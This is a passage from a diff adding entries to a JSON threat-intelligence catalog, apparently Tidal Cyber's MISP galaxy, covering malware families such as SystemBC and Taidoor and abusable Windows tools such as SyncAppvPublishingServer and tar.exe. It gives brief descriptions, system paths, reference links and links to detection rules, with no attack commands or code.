], + "uuid": "815e5fef-a5fc-4c84-94d1-c57c2f9991e1", + "value": "Syncappvpublishingserver.vbs" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Script used related to app-v and publishing server\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\SyncAppvPublishingServer.vbs\n\n**Resources:**\n* [https://twitter.com/monoxgas/status/895045566090010624](https://twitter.com/monoxgas/status/895045566090010624)\n* [https://twitter.com/subTee/status/855738126882316288](https://twitter.com/subTee/status/855738126882316288)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml)[[Syncappvpublishingserver.vbs - LOLBAS Project](/references/adb09226-894c-4874-a2e3-fb2c6de30173)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5261", + "source": "Tidal Cyber", + "tags": [ + "9e504206-7a84-40a5-b896-8995d82e3586", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "815e5fef-a5fc-4c84-94d1-c57c2f9991e1", + "type": "similar" + } + ], + "uuid": "6af0eac2-c35f-4569-ae09-47f1ca846961", + "value": "Syncappvpublishingserver" + }, + { + "description": "[[SyncAppvPublishingServer.exe - LOLBAS Project](/references/ce371df7-aab6-4338-9491-656481cb5601)]", + "meta": { + "id": "9bd61023-e8f9-450b-9d23-299d756f3418", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "f2928533-34e1-4599-a3ec-c8b4ef9d81b4", + "type": "similar" + } + ], + "uuid": "3dbccfe5-d7f9-494f-9466-6aa4ca5d31c3", + "value": "SyncAppvPublishingServer.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by App-v to get App-v server lists\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\SyncAppvPublishingServer.exe\n* C:\\Windows\\SysWOW64\\SyncAppvPublishingServer.exe\n\n**Resources:**\n* [https://twitter.com/monoxgas/status/895045566090010624](https://twitter.com/monoxgas/status/895045566090010624)\n\n**Detection:**\n* Sigma: [posh_ps_syncappvpublishingserver_exe.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml)\n* Sigma: [posh_pm_syncappvpublishingserver_exe.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml)\n* Sigma: [proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml)\n* IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed[[SyncAppvPublishingServer.exe - LOLBAS Project](/references/ce371df7-aab6-4338-9491-656481cb5601)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5166", + "source": "Tidal Cyber", + "tags": [ + "acda137a-d1c9-4216-9c08-d07c8d899725", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3dbccfe5-d7f9-494f-9466-6aa4ca5d31c3", + "type": "similar" + } + ], + "uuid": "f2928533-34e1-4599-a3ec-c8b4ef9d81b4", + "value": "SyncAppvPublishingServer" + }, + { + "description": "[SYNful Knock](https://app.tidalcyber.com/software/69ab291d-5066-4e47-9862-1f5c7bac7200) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)][[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]", + "meta": { + "platforms": [ + "Network" + ], + "software_attack_id": "S0519", + "source": "MITRE", + "tags": [ + "b20e7912-6a8d-46e3-8e13-9a3fc4813852" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "84c1ecc6-e5a2-4e8a-bf4b-651a618e0053", + "type": "similar" + } + ], + "uuid": "69ab291d-5066-4e47-9862-1f5c7bac7200", + "value": "SYNful Knock" + }, + { + "description": "[Sys10](https://app.tidalcyber.com/software/2df35a92-2295-417a-af5a-ba5c943ef40d) is a backdoor that was used throughout 2013 by [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d). [[Baumgartner Naikon 2015](https://app.tidalcyber.com/references/09302b4f-7f71-4289-92f6-076c685f0810)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0060", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "7f8730af-f683-423f-9ee1-5f6875a80481", + "type": "similar" + } + ], + "uuid": "2df35a92-2295-417a-af5a-ba5c943ef40d", + "value": "Sys10" + }, + { + "description": "[SYSCON](https://app.tidalcyber.com/software/ea556a8d-4959-423f-a2dd-622d0497d484) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://app.tidalcyber.com/software/ea556a8d-4959-423f-a2dd-622d0497d484) has been delivered by the [CARROTBALL](https://app.tidalcyber.com/software/84bb4068-b441-435e-8535-02a458ffd50b) and [CARROTBAT](https://app.tidalcyber.com/software/aefa893d-fc6e-41a9-8794-2700049db9e5) droppers.[[Unit 42 CARROTBAT November 2018](https://app.tidalcyber.com/references/6986a64a-5fe6-4697-b70b-79cccaf3d730)][[Unit 42 CARROTBAT January 2020](https://app.tidalcyber.com/references/b65442ca-18ca-42e0-8be0-7c2b66c26d02)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0464", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "edf5aee2-9b1c-4252-8e64-25b12f14c8b3", + "type": "similar" + } + ], + "uuid": "ea556a8d-4959-423f-a2dd-622d0497d484", + "value": "SYSCON" + }, + { + "description": "[[Syssetup.dll - LOLBAS Project](/references/3bb7027f-7cbb-47e7-8cbb-cf45604669af)]", + "meta": { + "id": "74ae8295-00a4-4a67-8892-14cf69005892", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "5d220e4f-db5f-4523-8dc5-63a604f3964b", + "type": "similar" + } + ], + "uuid": "fcadb7cd-ab8b-48e8-aee1-f8aa0ae3649d", + "value": "Syssetup.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows NT System Setup\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\syssetup.dll\n* c:\\windows\\syswow64\\syssetup.dll\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/994392481927258113](https://twitter.com/pabraeken/status/994392481927258113)\n* [https://twitter.com/harr0ey/status/975350238184697857](https://twitter.com/harr0ey/status/975350238184697857)\n* [https://twitter.com/bohops/status/975549525938135040](https://twitter.com/bohops/status/975549525938135040)\n* [https://windows10dll.nirsoft.net/syssetup_dll.html](https://windows10dll.nirsoft.net/syssetup_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Splunk: [detect_rundll32_application_control_bypass___syssetup.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml)[[Syssetup.dll - LOLBAS Project](/references/3bb7027f-7cbb-47e7-8cbb-cf45604669af)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5199", + "source": "Tidal Cyber", + "tags": [ + "9105775d-bdcb-45cc-895d-6c7bbb3d30ce", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "fcadb7cd-ab8b-48e8-aee1-f8aa0ae3649d", + "type": "similar" + } + ], + "uuid": "5d220e4f-db5f-4523-8dc5-63a604f3964b", + "value": "Syssetup" + }, + { + "description": "", + "meta": { + "id": "9e992775-530e-4bd6-bd0e-b02ffc650535", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "c30929fb-28a1-407c-a1c3-a83374c63267", + "type": "similar" + } + ], + "uuid": "bfbd9f5b-1f12-4196-a3d9-0862306cf3a9", + "value": "Coroxy" + }, + { + "description": "", + "meta": { + "id": "ce29a1e6-d1be-4a46-9ae4-ef9dbcf1d48f", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "c30929fb-28a1-407c-a1c3-a83374c63267", + "type": "similar" + } + ], + "uuid": "11ea8d63-aa36-4c63-a1a3-6950edc006dd", + "value": "DroxiDat" + }, + { + "description": "SystemBC is a commodity backdoor malware used as a Tor proxy and remote access Trojan (RAT). It was used during the high-profile 2021 Colonial Pipeline DarkSide ransomware attack and has since been used as a persistence & lateral movement tool during other ransomware compromises, including intrusions involving Ryuk, Egregor, and Play.[[BlackBerry SystemBC June 10 2021](/references/08186ff9-6ca5-4c09-b5e7-b883eb15fdba)][[Sophos SystemBC December 16 2020](/references/eca1301f-deeb-4a97-8c4e-e61210706116)][[WithSecure SystemBC May 10 2021](/references/4004e072-9e69-4e81-a2b7-840e106cf3d9)][[Trend Micro Play Ransomware September 06 2022](/references/ed02529c-920d-4a92-8e86-be1ed7083991)] According to Mandiant's 2023 M-Trends report, SystemBC was the second most frequently seen malware family in 2022 after only Cobalt Strike Beacon.[[TechRepublic M-Trends 2023](/references/1347e21e-e77d-464d-bbbe-dc4d3f2b07a1)]\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc\n\n**Malware Bazaar (Samples & IOCs)**: https://bazaar.abuse.ch/browse/tag/systembc/\n\n**PulseDive (IOCs)**: https://pulsedive.com/threat/SystemBC", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5058", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "2e2d3e75-1160-4ba5-80cc-8e7685fcfc44", + "type": "used-by" + }, + { + "dest-uuid": "28f3dbcc-b248-442f-9ff3-234210bb2f2a", + "type": "used-by" + }, + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + }, + { + "dest-uuid": "bfbd9f5b-1f12-4196-a3d9-0862306cf3a9", + "type": "similar" + }, + { + "dest-uuid": "11ea8d63-aa36-4c63-a1a3-6950edc006dd", + "type": "similar" + } + ], + "uuid": "c30929fb-28a1-407c-a1c3-a83374c63267", + "value": "SystemBC" + }, + { + "description": "[Systeminfo](https://app.tidalcyber.com/software/cecea681-a753-47b5-9d77-c10a5b4403ab) is a Windows utility that can be used to gather detailed information about a computer. [[TechNet Systeminfo](https://app.tidalcyber.com/references/5462ba66-6e26-41c2-bc28-6c19085d4469)]", + "meta": { + "platforms": [], + "software_attack_id": "S0096", + "source": "MITRE", + "tags": [ + "7b918200-2c8d-4b86-a81b-b2bdec5b2c2b", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "used-by" + }, + { + "dest-uuid": "8567136b-f84a-45ed-8cce-46324c7da60e", + "type": "used-by" + }, + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "863b7013-133d-4a82-93d2-51b53a8fd30e", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", + "type": "similar" + } + ], + "uuid": "cecea681-a753-47b5-9d77-c10a5b4403ab", + "value": "Systeminfo" + }, + { + "description": "[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", + "meta": { + "id": "63261928-0942-43f6-a85c-5d5b1d35d260" + }, + "related": [ + { + "dest-uuid": "148d587c-3b1e-4e71-bdfb-8c37005e7e77", + "type": "similar" + } + ], + "uuid": "0bfb3ec0-ee20-4de3-a69c-096402a0298b", + "value": "HyperSSL" + }, + { + "description": "[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", + "meta": { + "id": "93ff18e4-d69f-4388-a2bb-f5d84108a9e2" + }, + "related": [ + { + "dest-uuid": "148d587c-3b1e-4e71-bdfb-8c37005e7e77", + "type": "similar" + } + ], + "uuid": "0bc0c9e4-a490-4ab1-a1c2-b8fd8dda05ce", + "value": "Soldier" + }, + { + "description": "[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", + "meta": { + "id": "1dbf10c2-9b78-4bc3-9f05-f969e7205447" + }, + "related": [ + { + "dest-uuid": "148d587c-3b1e-4e71-bdfb-8c37005e7e77", + "type": "similar" + } + ], + "uuid": "01924f4b-e6b3-4118-9b3d-6aac519d4774", + "value": "FOCUSFJORD" + }, + { + "description": "[SysUpdate](https://app.tidalcyber.com/software/148d587c-3b1e-4e71-bdfb-8c37005e7e77) is a backdoor written in C++ that has been used by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) since at least 2020.[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0663", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "c009560a-f097-45a3-8f9f-78ec1440a783", + "type": "similar" + }, + { + "dest-uuid": "0bfb3ec0-ee20-4de3-a69c-096402a0298b", + "type": "similar" + }, + { + "dest-uuid": "0bc0c9e4-a490-4ab1-a1c2-b8fd8dda05ce", + "type": "similar" + }, + { + "dest-uuid": "01924f4b-e6b3-4118-9b3d-6aac519d4774", + "type": "similar" + } + ], + "uuid": "148d587c-3b1e-4e71-bdfb-8c37005e7e77", + "value": "SysUpdate" + }, + { + "description": "[T9000](https://app.tidalcyber.com/software/c5647cc4-0d46-4a41-8591-9179737747a2) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. [[FireEye admin@338 March 2014](https://app.tidalcyber.com/references/6a37e6eb-b767-4b10-9c39-660a42b19ddd)] [[Palo Alto T9000 Feb 2016](https://app.tidalcyber.com/references/d7eefe85-86cf-4b9d-bf70-f16c5a0227cc)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0098", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "876f6a77-fbc5-4e13-ab1a-5611986730a3", + "type": "similar" + } + ], + "uuid": "c5647cc4-0d46-4a41-8591-9179737747a2", + "value": "T9000" + }, + { + "description": "According to joint Cybersecurity Advisory AA23-320A (November 2023), Tactical RMM is a publicly available, legitimate tool that \"enables remote monitoring and management of systems\". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5066", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + } + ], + "uuid": "ba4777f9-bb3b-4143-8062-a510c30544ce", + "value": "Tactical RMM" + }, + { + "description": "[Taidoor](https://app.tidalcyber.com/software/9334df79-9023-44bb-bc28-16c1f07b836b) is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.[[CISA MAR-10292089-1.v2 TAIDOOR August 2021](https://app.tidalcyber.com/references/0ae18fda-cc88-49f4-8e85-7b63044579ea)] [Taidoor](https://app.tidalcyber.com/software/9334df79-9023-44bb-bc28-16c1f07b836b) has primarily been used against Taiwanese government organizations since at least 2010.[[TrendMicro Taidoor](https://app.tidalcyber.com/references/3d703dfa-97c5-498f-a712-cb4995119297)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0011", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b143dfa4-e944-43ff-8429-bfffc308c517", + "type": "similar" + } + ], + "uuid": "9334df79-9023-44bb-bc28-16c1f07b836b", + "value": "Taidoor" + }, + { + "description": "According to joint Cybersecurity Advisory AA23-320A (November 2023), Tailscale is a publicly available, legitimate tool that \"provides virtual private networks (VPNs) to secure network communications\". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5069", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + } + ], + "uuid": "130a5491-1b93-45fd-bd72-9e5f8ddeba2a", + "value": "Tailscale" + }, + { + "description": "[TAINTEDSCRIBE](https://app.tidalcyber.com/software/1548c94a-fb4d-43d8-9956-ea26f5cc552f) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). It was first reported in May 2020.[[CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020](https://app.tidalcyber.com/references/b9946fcc-592a-4c54-b504-4fe5050704df)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0586", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "7f4bbe05-1674-4087-8a16-8f1ad61b6152", + "type": "similar" + } + ], + "uuid": "1548c94a-fb4d-43d8-9956-ea26f5cc552f", + "value": "TAINTEDSCRIBE" + }, + { + "description": "[TajMahal](https://app.tidalcyber.com/software/b1b7a8d9-6df3-4e89-8622-a6eea3da729b) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://app.tidalcyber.com/software/b1b7a8d9-6df3-4e89-8622-a6eea3da729b) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.[[Kaspersky TajMahal April 2019](https://app.tidalcyber.com/references/1ed20522-52ae-4d0c-b42e-c680490958ac)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0467", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b51797f7-57da-4210-b8ac-b8632ee75d70", + "type": "similar" + } + ], + "uuid": "b1b7a8d9-6df3-4e89-8622-a6eea3da729b", + "value": "TajMahal" + }, + { + "description": "[[Tar.exe - LOLBAS Project](/references/e5f54ded-3ec1-49c1-9302-6b9f372d5015)]", + "meta": { + "id": "5c2b387e-c772-4ad7-8ee2-3954bca90a06", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "65e149a8-7c78-40d0-9cc5-9f420011facc", + "type": "similar" + } + ], + "uuid": "13f7f0ae-b228-4453-b35e-cded8c9bcbb4", + "value": "Tar.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to extract and create archives.\n\n**Author:** Brian Lucero\n\n**Paths:**\n* C:\\Windows\\System32\\tar.exe\n\n**Resources:**\n* [https://twitter.com/Cyber_Sorcery/status/1619819249886969856](https://twitter.com/Cyber_Sorcery/status/1619819249886969856)\n\n**Detection:**\n* IOC: tar.exe extracting files from a remote host within the environment[[Tar.exe - LOLBAS Project](/references/e5f54ded-3ec1-49c1-9302-6b9f372d5015)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5167", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "13f7f0ae-b228-4453-b35e-cded8c9bcbb4", + "type": "similar" + } + ], + "uuid": "65e149a8-7c78-40d0-9cc5-9f420011facc", + "value": "Tar" + }, + { + "description": "[Tarrask](https://app.tidalcyber.com/software/7bb9d181-4405-4938-bafb-b13cc98b6cd8) is malware that has been used by [HAFNIUM](https://app.tidalcyber.com/groups/1bcc9382-ccfe-4b04-91f3-ef1250df5e5b) since at least August 2021. [Tarrask](https://app.tidalcyber.com/software/7bb9d181-4405-4938-bafb-b13cc98b6cd8) was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.[[Tarrask scheduled task](https://app.tidalcyber.com/references/87682623-d1dd-4ee8-ae68-b08be5113e3e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1011", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "1bcc9382-ccfe-4b04-91f3-ef1250df5e5b", + "type": "used-by" + }, + { + "dest-uuid": "988976ff-beeb-4fb5-b07d-ca7437ea66e8", + "type": "similar" + } + ], + "uuid": "7bb9d181-4405-4938-bafb-b13cc98b6cd8", + "value": "Tarrask" + }, + { + "description": "The [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. [[Microsoft Tasklist](https://app.tidalcyber.com/references/2c09561a-02ee-4948-9745-9d6c8eb2881d)]", + "meta": { + "platforms": [], + "software_attack_id": "S0057", + "source": "MITRE", + "tags": [ + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "cd1b5d44-226e-4405-8985-800492cf2865", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "used-by" + }, + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", + "type": "similar" + } + ], + "uuid": "abae8f19-9497-4a71-82b6-ae6edd26ad98", + "value": "Tasklist" + }, + { + "description": "tcpdump is an open-source network packet analyzer utility run from the command line.", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S5267", + "source": "Tidal Cyber", + "tags": [ + "02495172-1563-48e7-8ac2-98463bd85e9d", + "6070668f-1cbd-4878-8066-c636d1d8659c", + "d8f7e071-fbfd-46f8-b431-e241bb1513ac", + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "cd1b5d44-226e-4405-8985-800492cf2865" + ], + "type": "tool" + }, + "related": [], + "uuid": "7a5d457c-949c-4e8f-817a-7e2d33f6c618", + "value": "tcpdump" + }, + { + "description": "TDSSKiller is a tool used to remove rootkits.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5044", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "c62b061a-b4d0-4b28-932c-3c9423443248", + "value": "TDSSKiller" + }, + { + "description": "[TDTESS](https://app.tidalcyber.com/software/e7116740-fe7c-45e2-b98d-0c594a7dff2f) is a 64-bit .NET binary backdoor used by [CopyKittens](https://app.tidalcyber.com/groups/6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b). [[ClearSky Wilted Tulip July 2017](https://app.tidalcyber.com/references/50233005-8dc4-4e91-9477-df574271df40)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0164", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b", + "type": "used-by" + }, + { + "dest-uuid": "0b32ec39-ba61-4864-9ebe-b4b0b73caf9a", + "type": "similar" + } + ], + "uuid": 